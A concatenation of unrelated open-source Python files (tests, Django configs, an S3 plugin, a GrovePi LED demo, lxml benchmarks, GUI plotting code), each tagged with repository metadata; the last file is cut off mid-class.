@mock.patch('pyramid_swagger.register_api_doc_endpoints')
def test_swagger_12_only(mock_register):
    # Requesting only swagger 1.2 builds the 1.2 schema and registers one
    # set of api-doc endpoints.
    settings = {
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
        'pyramid_swagger.swagger_versions': ['1.2']
    }
    mock_config = mock.Mock(registry=mock.Mock(settings=settings))
    pyramid_swagger.includeme(mock_config)
    assert isinstance(settings['pyramid_swagger.schema12'], SwaggerSchema)
    assert mock_register.call_count == 1


@mock.patch('pyramid_swagger.register_api_doc_endpoints')
def test_swagger_20_only(mock_register):
    # Requesting only swagger 2.0 builds the 2.0 spec, leaves the 1.2
    # schema unset, and registers one set of endpoints.
    settings = {
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
        'pyramid_swagger.swagger_versions': ['2.0']
    }
    mock_config = mock.Mock(registry=mock.Mock(settings=settings))
    pyramid_swagger.includeme(mock_config)
    assert isinstance(settings['pyramid_swagger.schema20'], Spec)
    assert not settings['pyramid_swagger.schema12']
    assert mock_register.call_count == 1


@mock.patch('pyramid_swagger.register_api_doc_endpoints')
def test_swagger_12_and_20(mock_register):
    # Requesting both versions builds both schemas and registers the
    # api-doc endpoints once per version.
    settings = {
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
        'pyramid_swagger.swagger_versions': ['1.2', '2.0']
    }
    mock_config = mock.Mock(registry=mock.Mock(settings=settings))
    pyramid_swagger.includeme(mock_config)
    assert isinstance(settings['pyramid_swagger.schema20'], Spec)
    assert isinstance(settings['pyramid_swagger.schema12'], SwaggerSchema)
    assert mock_register.call_count == 2
| analogue/pyramid_swagger | tests/includeme_test.py | Python | bsd-3-clause | 3,308 |
"""
WSGI config for dj_bookmarks project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dj_bookmarks.settings")
application = get_wsgi_application()
| kennethlove/django_bookmarks | dj_bookmarks/dj_bookmarks/wsgi.py | Python | bsd-3-clause | 402 |
__author__ = 'tan'
import os
import boto
from boto.s3.key import Key
from juliabox.cloud import JBPluginCloud
class JBoxS3(JBPluginCloud):
    """S3-backed bucket store plugin.

    Lazily creates a single boto S3 connection and caches bucket handles by
    name. All methods are static; shared state lives on the class itself.
    Keys are always named after the basename of the local file path.
    """
    provides = [JBPluginCloud.JBP_BUCKETSTORE, JBPluginCloud.JBP_BUCKETSTORE_S3]

    CONN = None        # lazily created boto S3 connection shared by all calls
    BUCKETS = dict()   # bucket name -> boto Bucket handle cache

    @staticmethod
    def connect():
        """Return the shared S3 connection, creating it on first use."""
        conn = JBoxS3.CONN
        if conn is None:
            conn = boto.connect_s3()
            JBoxS3.CONN = conn
        return conn

    @staticmethod
    def connect_bucket(bucket):
        """Return a cached handle for *bucket*, fetching it on first use."""
        try:
            return JBoxS3.BUCKETS[bucket]
        except KeyError:
            handle = JBoxS3.connect().get_bucket(bucket)
            JBoxS3.BUCKETS[bucket] = handle
            return handle

    @staticmethod
    def push(bucket, local_file, metadata=None):
        """Upload *local_file* into *bucket* and return the created key."""
        key = Key(JBoxS3.connect_bucket(bucket))
        key.key = os.path.basename(local_file)
        if metadata is not None:
            for meta_name, meta_value in metadata.iteritems():
                key.set_metadata(meta_name, meta_value)
        key.set_contents_from_filename(local_file)
        return key

    @staticmethod
    def pull(bucket, local_file, metadata_only=False):
        """Fetch the key named after *local_file*; download it unless
        ``metadata_only``. Returns the key, or None when it does not exist."""
        key = JBoxS3.connect_bucket(bucket).get_key(os.path.basename(local_file))
        if key is not None and not metadata_only:
            key.get_contents_to_filename(local_file)
        return key

    @staticmethod
    def delete(bucket, local_file):
        """Delete the key named after *local_file*; returns boto's result."""
        return JBoxS3.connect_bucket(bucket).delete_key(os.path.basename(local_file))

    @staticmethod
    def copy(from_file, to_file, from_bucket, to_bucket=None):
        """Copy a key between buckets (same bucket when *to_bucket* is None).

        Returns the new key, or None when the source key does not exist.
        """
        target_bucket = from_bucket if to_bucket is None else to_bucket
        source = JBoxS3.connect_bucket(from_bucket).get_key(os.path.basename(from_file))
        if source is None:
            return None
        return source.copy(target_bucket, os.path.basename(to_file))

    @staticmethod
    def move(from_file, to_file, from_bucket, to_bucket=None):
        """Copy then delete the source key; returns the new key or None."""
        new_key = JBoxS3.copy(from_file, to_file, from_bucket, to_bucket)
        if new_key is None:
            return None
        JBoxS3.delete(from_bucket, from_file)
        return new_key
import asyncio
import uvloop
from aioactor.transports import NatsTransport
from aioactor.service import Service
from aioactor.broker import ServiceBroker
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
# TODO ADD possible actions list!
# TODO ADD abstractions to Message Handler!
# MessageHandler must be able to call methods of Service and control requests
# TODO Aggregate date about user [userinfo, location, photo]
class UsersService(Service):
    """Example service exposing a single ``get`` action for user lookup."""

    def __init__(self):
        self.name = "users"
        # Action name -> handler coroutine exposed through the broker.
        self.actions = {'get': self.get_user_name}

    async def get_user_name(self, user_id: int) -> dict:
        """Return the stored record for *user_id*, or {} when unknown."""
        known_users = {
            1: {'firstname': 'Antonio', 'lastname': 'Rodrigas'},
        }
        return known_users.get(user_id, {})
# TODO Add protected types for registration
# TODO Add protocols accepted types for services
def register_services(broker, services):
    """Instantiate each service class in *services* and register it
    with *broker*."""
    for service_cls in services:
        instance = service_cls()
        broker.create_service(instance)
async def main():
    """Create a ServiceBroker, register the example services and start it."""
    # Broker configuration: console logging and NATS message transport.
    settings = {
        'logger': 'console',
        'message_transport': {
            'handler': NatsTransport
        }
    }
    broker = ServiceBroker(io_loop=loop, **settings)  # relies on module-global `loop`
    services = [UsersService]
    register_services(broker, services)
    print(broker.available_services())
    await broker.start()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.run_forever()
loop.close()
| iZonex/aioactor | examples/accounts/app.py | Python | apache-2.0 | 1,531 |
#!/usr/bin/env python
#
# GrovePi Example for using the Grove Chainable RGB LED (http://www.seeedstudio.com/wiki/Grove_-_Chainable_RGB_LED)
#
# The GrovePi connects the Raspberry Pi and Grove sensors. You can learn more about GrovePi here: http://www.dexterindustries.com/GrovePi
#
# Have a question about this example? Ask on the forums here: http://www.dexterindustries.com/forum/?forum=grovepi
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2015 Dexter Industries
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import time
import grovepi
# Connect first LED in Chainable RGB LED chain to digital port D7
# In: CI,DI,VCC,GND
# Out: CO,DO,VCC,GND
# First LED of the chain is driven from digital port D7.
pin = 7

# I have 10 LEDs connected in series with the first connected to the GrovePi
# and the last not connected.
# First LED input socket connected to GrovePi, output socket connected to
# second LED input and so on.
numleds = 10 #If you only plug 1 LED, change 10 to 1

grovepi.pinMode(pin,"OUTPUT")
time.sleep(1)  # give the GrovePi firmware a moment before sending commands

# Chainable RGB LED methods
# grovepi.storeColor(red, green, blue)
# grovepi.chainableRgbLed_init(pin, numLeds)
# grovepi.chainableRgbLed_test(pin, numLeds, testColor)
# grovepi.chainableRgbLed_pattern(pin, pattern, whichLed)
# grovepi.chainableRgbLed_modulo(pin, offset, divisor)
# grovepi.chainableRgbLed_setLevel(pin, level, reverse)

# test colors used in grovepi.chainableRgbLed_test()
# (3-bit value: one bit per RGB channel)
testColorBlack = 0   # 0b000 #000000
testColorBlue = 1    # 0b001 #0000FF
testColorGreen = 2   # 0b010 #00FF00
testColorCyan = 3    # 0b011 #00FFFF
testColorRed = 4     # 0b100 #FF0000
testColorMagenta = 5 # 0b101 #FF00FF
testColorYellow = 6  # 0b110 #FFFF00
testColorWhite = 7   # 0b111 #FFFFFF

# patterns used in grovepi.chainableRgbLed_pattern()
thisLedOnly = 0
allLedsExceptThis = 1
thisLedAndInwards = 2
thisLedAndOutwards = 3
try:
print "Test 1) Initialise"
# init chain of leds
grovepi.chainableRgbLed_init(pin, numleds)
time.sleep(.5)
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set led 1 to green
grovepi.chainableRgbLed_pattern(pin, thisLedOnly, 0)
time.sleep(.5)
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set led 10 to red
grovepi.chainableRgbLed_pattern(pin, thisLedOnly, 9)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 2a) Test Patterns - black")
# test pattern 0 - black (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(1)
print ("Test 2b) Test Patterns - blue")
# test pattern 1 blue
grovepi.chainableRgbLed_test(pin, numleds, testColorBlue)
time.sleep(1)
print ("Test 2c) Test Patterns - green")
# test pattern 2 green
grovepi.chainableRgbLed_test(pin, numleds, testColorGreen)
time.sleep(1)
print ("Test 2d) Test Patterns - cyan")
# test pattern 3 cyan
grovepi.chainableRgbLed_test(pin, numleds, testColorCyan)
time.sleep(1)
print ("Test 2e) Test Patterns - red")
# test pattern 4 red
grovepi.chainableRgbLed_test(pin, numleds, testColorRed)
time.sleep(1)
print ("Test 2f) Test Patterns - magenta")
# test pattern 5 magenta
grovepi.chainableRgbLed_test(pin, numleds, testColorMagenta)
time.sleep(1)
print ("Test 2g) Test Patterns - yellow")
# test pattern 6 yellow
grovepi.chainableRgbLed_test(pin, numleds, testColorYellow)
time.sleep(1)
print ("Test 2h) Test Patterns - white")
# test pattern 7 white
grovepi.chainableRgbLed_test(pin, numleds, testColorWhite)
time.sleep(1)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3a) Set using pattern - this led only")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set led 3 to red
grovepi.chainableRgbLed_pattern(pin, thisLedOnly, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3b) Set using pattern - all leds except this")
# change color to blue
grovepi.storeColor(0,0,255)
time.sleep(.5)
# set all leds except for 3 to blue
grovepi.chainableRgbLed_pattern(pin, allLedsExceptThis, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3c) Set using pattern - this led and inwards")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set leds 1-3 to green
grovepi.chainableRgbLed_pattern(pin, thisLedAndInwards, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3d) Set using pattern - this led and outwards")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set leds 7-10 to green
grovepi.chainableRgbLed_pattern(pin, thisLedAndOutwards, 6)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4a) Set using modulo - all leds")
# change color to black (fully off)
grovepi.storeColor(0,0,0)
time.sleep(.5)
# set all leds black
# offset 0 means start at first led
# divisor 1 means every led
grovepi.chainableRgbLed_modulo(pin, 0, 1)
time.sleep(.5)
# change color to white (fully on)
grovepi.storeColor(255,255,255)
time.sleep(.5)
# set all leds white
grovepi.chainableRgbLed_modulo(pin, 0, 1)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4b) Set using modulo - every 2")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set every 2nd led to red
grovepi.chainableRgbLed_modulo(pin, 0, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
print ("Test 4c) Set using modulo - every 2, offset 1")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set every 2nd led to green, offset 1
grovepi.chainableRgbLed_modulo(pin, 1, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4d) Set using modulo - every 3, offset 0")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set every 3nd led to red
grovepi.chainableRgbLed_modulo(pin, 0, 3)
time.sleep(.5)
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set every 3nd led to green, offset 1
grovepi.chainableRgbLed_modulo(pin, 1, 3)
time.sleep(.5)
# change color to blue
grovepi.storeColor(0,0,255)
time.sleep(.5)
# set every 3nd led to blue, offset 2
grovepi.chainableRgbLed_modulo(pin, 2, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4e) Set using modulo - every 3, offset 1")
# change color to yellow
grovepi.storeColor(255,255,0)
time.sleep(.5)
# set every 4nd led to yellow
grovepi.chainableRgbLed_modulo(pin, 1, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
print ("Test 4f) Set using modulo - every 3, offset 2")
# change color to magenta
grovepi.storeColor(255,0,255)
time.sleep(.5)
# set every 4nd led to magenta
grovepi.chainableRgbLed_modulo(pin, 2, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 5a) Set level 6")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set leds 1-6 to green
grovepi.write_i2c_block(0x04,[95,pin,6,0])
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 5b) Set level 7 - reverse")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set leds 4-10 to red
grovepi.write_i2c_block(0x04,[95,pin,7,1])
time.sleep(.5)
except KeyboardInterrupt:
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
except IOError:
print ("Error")
| gerald-yang/ubuntu-iotivity-demo | snappy/grovepi/pygrovepi/grove_chainable_rgb_led.py | Python | apache-2.0 | 10,250 |
def find_child(tag, value_to_pos, parent_value=None, child_separator=':'):
    """
    Find or create the nested PartOfSpeech addressed by *tag* and return it.

    :param tag: Possibly nested tag such as ``"noun:proper"``; each
        *child_separator* introduces one more nesting level.
    :param value_to_pos: Dict tree holding intermediate dicts and, at the
        leaves, PartOfSpeech instances. Mutated in place.
    :param parent_value: Value of the enclosing tag, forwarded to a newly
        created PartOfSpeech leaf.
    :param child_separator: Separator between nesting levels.
    """
    from beard import pos

    chain = tag.split(child_separator, 1)
    parent = chain[0]
    if len(chain) > 1:
        # Descend into (or create) the intermediate dict for this level.
        parent_val = value_to_pos.setdefault(parent, {})
        return find_child(chain[1], parent_val, parent, child_separator)
    # Leaf level: setdefault both stores and returns the entry, so the
    # original's redundant re-assignment is dropped. NOTE: the PartOfSpeech
    # argument is still constructed even when the key already exists,
    # because call arguments are evaluated eagerly.
    return value_to_pos.setdefault(parent, pos.PartOfSpeech(parent, parent_value, 0))
def get_leaves(look_in):
    """
    Return every non-dict value reachable anywhere inside *look_in*.
    """
    leaves = []
    for value in look_in.values():
        # Exact type check (not isinstance) mirrors the original contract:
        # dict subclasses count as leaves, not as containers to descend into.
        if type(value) is dict:
            leaves.extend(get_leaves(value))
        else:
            leaves.append(value)
    return leaves
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-09-14 23:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add an optional ``teacher`` foreign key to the ``Course`` model."""

    dependencies = [
        ('organization', '0004_teacher_image'),
        ('courses', '0006_auto_20170914_2345'),
    ]

    operations = [
        migrations.AddField(
            model_name='course',
            name='teacher',
            # Nullable/blank so existing Course rows migrate without a
            # default; CASCADE removes courses when their teacher is deleted.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='organization.Teacher', verbose_name='\u8bb2\u5e08'),
        ),
    ]
| LennonChin/Django-Practices | MxOnline/apps/courses/migrations/0007_course_teacher.py | Python | apache-2.0 | 640 |
groups = {}
| drscream/teamvault | bundlewrap/groups.py | Python | gpl-3.0 | 12 |
from datetime import datetime
from whylog.config.filename_matchers import WildCardFilenameMatcher
from whylog.config.investigation_plan import Clue, InvestigationPlan, InvestigationStep, LineSource
from whylog.config.log_type import LogType
from whylog.config.parser_subset import ConcatenatedRegexParser
from whylog.config.parsers import RegexParser
from whylog.config.rule import Rule
from whylog.config.super_parser import RegexSuperParser
# mocked investigation plan for 003_match_time_range test
# TODO: remove mock
def mocked_investigation_plan():
    """Build a hand-crafted InvestigationPlan for the 003_match_time_range test.

    One 'default' log type backed by a single wildcard filename matcher, one
    cause->effect rule linked by a 1-second 'time' constraint, and the effect
    clue observed at 2015-12-03 12:08:09.
    """
    # Super parser: extracts the leading timestamp as group 1 of type 'date'.
    super_parser = RegexSuperParser('^(\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d).*', [1], {1: 'date'})
    matcher = WildCardFilenameMatcher('localhost', 'node_1.log', 'default', super_parser)
    default_log_type = LogType('default', [matcher])
    # Cause/effect line parsers for the two log lines under investigation.
    cause = RegexParser(
        'cause', '2015-12-03 12:08:08 root cause',
        '^(\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d) root cause$', [1], 'default', {1: 'date'}
    )
    effect = RegexParser(
        'effect', '2015-12-03 12:08:09 visible effect',
        '^(\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d) visible effect$', [1], 'default', {1: 'date'}
    )
    concatenated = ConcatenatedRegexParser([cause])
    effect_time = datetime(2015, 12, 3, 12, 8, 9)
    # Search window: one second before the effect up to the effect itself.
    search_range = {
        'default': {
            'date': {
                'left_bound': datetime(2015, 12, 3, 12, 8, 8),
                'right_bound': effect_time
            }
        }
    }
    default_investigation_step = InvestigationStep(concatenated, search_range)
    # Rule: cause must precede effect by at most 1 second ('time' constraint).
    rule = Rule(
        [cause], effect, [
            {
                'clues_groups': [[1, 1], [0, 1]],
                'name': 'time',
                'params': {'max_delta': 1}
            }
        ], Rule.LINKAGE_AND
    )  # yapf: disable
    line_source = LineSource('localhost', 'node_1.log')
    effect_clues = {'effect': Clue((effect_time,), 'visible effect', 40, line_source)}
    return InvestigationPlan([rule], [(default_investigation_step, default_log_type)], effect_clues)
| andrzejgorski/whylog | whylog/config/mocked_investigation_plan.py | Python | bsd-3-clause | 2,019 |
"""jass URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('project.jass.urls', namespace="jass")),
]
| SRGSSR/jass | project/urls.py | Python | mit | 817 |
import numpy as np
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QGraphicsPixmapItem, QApplication
from urh.signalprocessing.Spectrogram import Spectrogram
from urh.ui.painting.SceneManager import SceneManager
from urh.ui.painting.SpectrogramScene import SpectrogramScene
class SpectrogramSceneManager(SceneManager):
    """Scene manager that renders a Spectrogram into a SpectrogramScene."""

    def __init__(self, samples, parent):
        super().__init__(parent)
        self.samples_need_update = True

        # NOTE(review): clear() is called on the scene created by the base
        # class, which is then immediately replaced by a SpectrogramScene.
        self.scene.clear()
        self.spectrogram = Spectrogram(samples)
        self.scene = SpectrogramScene()

    @property
    def num_samples(self):
        # Number of raw samples backing the spectrogram.
        return len(self.spectrogram.samples)

    def set_parameters(self, samples: np.ndarray, window_size, data_min, data_max) -> bool:
        """
        Return true if redraw is needed
        """
        redraw_needed = False
        # Samples are only refreshed when someone flagged them stale.
        if self.samples_need_update:
            self.spectrogram.samples = samples
            redraw_needed = True
            self.samples_need_update = False

        if window_size != self.spectrogram.window_size:
            self.spectrogram.window_size = window_size
            redraw_needed = True

        if data_min != self.spectrogram.data_min:
            self.spectrogram.data_min = data_min
            redraw_needed = True

        if data_max != self.spectrogram.data_max:
            self.spectrogram.data_max = data_max
            redraw_needed = True

        return redraw_needed

    def show_scene_section(self, x1: float, x2: float, subpath_ranges=None, colors=None):
        # Intentionally a no-op: the spectrogram is always drawn in full.
        pass

    def update_scene_rect(self):
        # Scene rectangle spans (time bins) x (frequency bins).
        self.scene.setSceneRect(0, 0, self.spectrogram.time_bins, self.spectrogram.freq_bins)

    def show_full_scene(self):
        """Redraw the whole spectrogram as a row of pixmap segments."""
        # Drop previously drawn segments before painting new ones.
        for item in self.scene.items():
            if isinstance(item, QGraphicsPixmapItem):
                self.scene.removeItem(item)

        x_pos = 0
        for image in self.spectrogram.create_image_segments():
            item = self.scene.addPixmap(QPixmap.fromImage(image))
            item.setPos(x_pos, 0)
            x_pos += image.width()
            QApplication.instance().processEvents()

        # Estimated time_bins from update_scene_rect may be too many for small signals so we update the scene rect
        # after we know how wide the spectrogram actually is
        self.scene.setSceneRect(0, 0, x_pos, self.spectrogram.freq_bins)

    def init_scene(self):
        # Nothing to prepare; drawing happens in show_full_scene().
        pass

    def eliminate(self):
        # Release sample buffers before tearing down the base scene manager.
        self.spectrogram.samples = None
        self.spectrogram = None
        super().eliminate()
| jopohl/urh | src/urh/ui/painting/SpectrogramSceneManager.py | Python | gpl-3.0 | 2,529 |
from django.db import models
from confess.models import Post
# Create your models here.
VOTE_CHOICES=(
(+1,'+1'),
(-1,'-1'),
(0,'0'),
)
class Like (models.Model):
    """A user's vote on a confession Post (one vote row per user per post)."""
    post = models.ForeignKey(Post)
    user_token = models.CharField(max_length=100)  # anonymous voter identifier
    vote = models.SmallIntegerField(choices=VOTE_CHOICES)  # +1, -1 or 0
    date = models.DateTimeField(auto_now_add=True)  # set once at creation
    liked = models.BooleanField(default=False)
    label = models.CharField(max_length=30)

    class Meta:
        # Enforce a single vote per (user, post) pair at the DB level.
        unique_together = (('user_token', 'post'),)

    def __unicode__(self):  # Python 2 string representation
        return unicode(self.post)
| amartinez1/confessions | likes/models.py | Python | mit | 552 |
import sys, copy
from itertools import *
import benchbase
from benchbase import (with_attributes, with_text, onlylib,
serialized, children, nochange)
############################################################
# Benchmarks
############################################################
class BenchMark(benchbase.TreeBenchMark):
    # lxml.objectify attribute-access benchmarks.
    # NOTE(review): the bare "1 2 4" strings in the method docstrings look
    # like tree-size selectors consumed by benchbase -- do not edit them.
    # precomputed iteration ranges reused by the bench_* loops
    repeat100 = range(100)
    repeat1000 = range(1000)
    repeat3000 = range(3000)
    def __init__(self, lib):
        # set up an objectify-aware parser and hand it to the base class
        from lxml import etree, objectify
        self.objectify = objectify
        parser = etree.XMLParser(remove_blank_text=True)
        lookup = objectify.ObjectifyElementClassLookup()
        parser.setElementClassLookup(lookup)
        super(BenchMark, self).__init__(etree, parser)
    @nochange
    def bench_attribute(self, root):
        "1 2 4"
        for i in self.repeat3000:
            root.zzzzz
    def bench_attribute_assign_int(self, root):
        "1 2 4"
        for i in self.repeat3000:
            root.XYZ = 5
    def bench_attribute_assign_string(self, root):
        "1 2 4"
        for i in self.repeat3000:
            root.XYZ = "5"
    @nochange
    def bench_attribute_cached(self, root):
        "1 2 4"
        # first access warms objectify's lookup before timing the loop
        cache = root.zzzzz
        for i in self.repeat3000:
            root.zzzzz
    @nochange
    def bench_attributes_deep(self, root):
        "1 2 4"
        for i in self.repeat3000:
            root.zzzzz['{cdefg}a00001']
    @nochange
    def bench_attributes_deep_cached(self, root):
        "1 2 4"
        # warm both lookup levels before the timed loop
        cache1 = root.zzzzz
        cache2 = cache1['{cdefg}a00001']
        for i in self.repeat3000:
            root.zzzzz['{cdefg}a00001']
    @nochange
    def bench_objectpath(self, root):
        "1 2 4"
        path = self.objectify.ObjectPath(".zzzzz")
        for i in self.repeat3000:
            path(root)
    @nochange
    def bench_objectpath_deep(self, root):
        "1 2 4"
        path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
        for i in self.repeat3000:
            path(root)
    @nochange
    def bench_objectpath_deep_cached(self, root):
        "1 2 4"
        cache1 = root.zzzzz
        cache2 = cache1['{cdefg}a00001']
        path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
        for i in self.repeat3000:
            path(root)
    @with_text(text=True, utext=True, no_text=True)
    def bench_annotate(self, root):
        self.objectify.annotate(root)
    @nochange
    def bench_descendantpaths(self, root):
        root.descendantpaths()
    @nochange
    @with_text(text=True)
    def bench_type_inference(self, root):
        "1 2 4"
        el = root.aaaaa
        for i in self.repeat1000:
            el.getchildren()
    @nochange
    @with_text(text=True)
    def bench_type_inference_annotated(self, root):
        "1 2 4"
        # same as bench_type_inference but with type annotations applied first
        el = root.aaaaa
        self.objectify.annotate(el)
        for i in self.repeat1000:
            el.getchildren()
    @nochange
    @children
    def bench_elementmaker(self, children):
        # build a small tree per child via the objectify ElementMaker API
        E = self.objectify.E
        for child in children:
            root = E.this(
                "test",
                E.will(
                    E.do("nothing"),
                    E.special,
                )
            )
if __name__ == '__main__':
    # hand the benchmark class to the shared benchbase driver
    benchbase.main(BenchMark)
| mhnatiuk/phd_sociology_of_religion | scrapper/build/lxml/benchmark/bench_objectify.py | Python | gpl-2.0 | 3,322 |
# plotwindow.py
# the main window for showing plots
# Copyright (C) 2004 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
from __future__ import division
import sys
import traceback
from ..compat import crange
from .. import qtall as qt4
import numpy as N
from .. import setting
from ..dialogs import exceptiondialog
from .. import document
from .. import utils
from .. import widgets
def _(text, disambiguation=None, context='PlotWindow'):
    """Translate text via Qt, defaulting to the 'PlotWindow' context."""
    return qt4.QCoreApplication.translate(context, text, disambiguation)
class PickerCrosshairItem( qt4.QGraphicsPathItem ):
    """The picker cross widget: it moves from point to point and curve to curve
    with the arrow keys, and hides itself when it loses focus"""
    def __init__(self, parent=None):
        # build the crosshair shape: two concentric squares plus a
        # horizontal and a vertical tick through the centre
        path = qt4.QPainterPath()
        path.addRect(-4, -4, 8, 8)
        path.addRect(-5, -5, 10, 10)
        path.moveTo(-8, 0)
        path.lineTo(8, 0)
        path.moveTo(0, -8)
        path.lineTo(0, 8)
        qt4.QGraphicsPathItem.__init__(self, path, parent)
        self.setBrush(qt4.QBrush(qt4.Qt.black))
        # focusable so keyPressEvent navigation can target the picker
        self.setFlags(self.flags() | qt4.QGraphicsItem.ItemIsFocusable)
    def paint(self, painter, option, widget):
        """Override this to enforce the global antialiasing setting"""
        aa = setting.settingdb['plot_antialias']
        painter.save()
        painter.setRenderHint(qt4.QPainter.Antialiasing, aa)
        qt4.QGraphicsPathItem.paint(self, painter, option, widget)
        painter.restore()
    def focusOutEvent(self, event):
        # hide the crosshair whenever keyboard focus moves elsewhere
        qt4.QGraphicsPathItem.focusOutEvent(self, event)
        self.hide()
class RenderControl(qt4.QObject):
    """Object for rendering plots in a separate thread.

    Jobs are (jobid, PaintHelper) pairs; worker threads take the newest job
    and stale results are discarded so only the latest render is displayed.
    """
    # emitted with (jobid, rendered image, painthelper) when a job completes
    signalRenderFinished = qt4.pyqtSignal(
        int, qt4.QImage, document.PaintHelper)
    def __init__(self, plotwindow):
        """Start up numthreads rendering threads."""
        qt4.QObject.__init__(self)
        # semaphore counts pending jobs; mutex guards the job bookkeeping
        self.sem = qt4.QSemaphore()
        self.mutex = qt4.QMutex()
        self.threads = []
        self.exit = False
        # pending jobs, newest taken first
        self.latestjobs = []
        self.latestaddedjob = -1
